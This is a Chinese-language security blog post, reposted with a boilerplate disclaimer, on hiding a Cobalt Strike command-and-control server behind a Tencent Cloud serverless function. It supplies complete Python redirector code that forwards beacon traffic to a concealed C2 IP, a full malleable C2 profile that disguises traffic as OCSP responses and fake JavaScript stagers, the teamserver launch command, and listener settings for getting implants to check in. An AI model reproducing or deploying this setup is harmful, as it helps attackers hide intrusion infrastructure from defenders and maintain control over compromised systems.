云函数隐藏C2

admin 2024年1月7日14:24:54评论49 views字数 1889阅读6分17秒阅读模式

工具版本:cobalt strike 4.7云函数平台:腾讯云

云函数(Cloud Functions)是一种无服务器计算服务,它允许你运行代码而无需管理服务器。

云函数配置

1.新建函数

云函数隐藏C2

2.编辑代码

云函数隐藏C2

代码示例:

# coding: utf8import json,requests,base64def main_handler(event, context):    response = {}    path = None    headers = None    try:        C2='http://IP'        if'path'in event.keys():            path=event['path']        if'headers'in event.keys():                headers=event['headers']        if'httpMethod'in event.keys() and event['httpMethod'] == 'GET' :            resp=requests.get(C2+path,headers=headers,verify=False)         else:            resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)            print(resp.headers)            print(resp.content)        response={            "isBase64Encoded": True,            "statusCode": resp.status_code,            "headers": dict(resp.headers),            "body": str(base64.b64encode(resp.content))[2:-1]        }    except Exception as e:        print('error')        print(e)    finally:        return response

3.创建触发器

云函数隐藏C2

4.触发管理

云函数隐藏C2

5.路径配置

如下图所示

云函数隐藏C2

6.发布服务

云函数隐藏C2

C2配置

新建<filename>.profile文件

set sample_name "t";set sleeptime "3000";set jitter    "0";set maxdns    "255";set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";
http-get {
set uri "/api/x";
client { header "Accept" "*/*"; metadata { base64; prepend "SESSIONID="; header "Cookie"; } }
server { header "Content-Type" "application/ocsp-response"; header "content-transfer-encoding" "binary"; header "Server" "Nodejs"; output { base64; print; } }}http-stager { set uri_x86 "/vue.min.js"; set uri_x64 "/bootstrap-2.min.js";}http-post { set uri "/api/y"; client { header "Accept" "*/*"; id { base64; prepend "JSESSION="; header "Cookie"; } output { base64; print; } }
server { header "Content-Type" "application/ocsp-response"; header "content-transfer-encoding" "binary"; header "Connection" "keep-alive"; output { base64; print; } }}

cobalt strike 4.7里面的c2lint用不了,这里使用cobalt strike 4.3的来帮助我们检验我们编写的profile文件是否正确

云函数隐藏C2

cobalt strike 4.7启动

nohup ./teamserver.sh ip passswd c2.profile &

监听器配置

:::info注意:1.端口为80/443,Hosts为我们刚刚在API网关中的地址2.需要删除前面的 http:// 或者 https://3.需要删除后面的 :80 或者 :4434.选择监听器时要注意是https还是http::::::warning否则会无法成功上线!:::

HTTPS配置

云函数隐藏C2

HTTP配置

云函数隐藏C2

成功上线

云函数隐藏C2

参考:https://mp.weixin.qq.com/s/W7KBv3H5TcVbEjalAyn3zw

原文始发于微信公众号(Relay学安全):云函数隐藏C2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月7日14:24:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   云函数隐藏C2https://cn-sec.com/archives/2372162.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息